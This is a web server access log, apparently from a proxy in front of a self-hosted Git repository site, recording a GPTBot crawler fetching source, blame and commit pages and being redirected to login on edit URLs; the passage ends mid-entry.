"/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13649] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13651] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21679] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15502] [Gzip 8.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=closed" +[17/Feb/2026:15:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8480] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=leastissues&state=closed" +[17/Feb/2026:15:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=leastcomplete&state=closed" +[17/Feb/2026:15:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=closed" +[17/Feb/2026:15:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11709] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fAssetPilot.pkg" [Client 74.7.227.38] [Length 20817] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:15:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist%2fGoldMonitor.exe" [Client 74.7.227.38] [Length 20824] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:15:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 1529] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 11632] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12736] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" +[17/Feb/2026:15:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10897] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 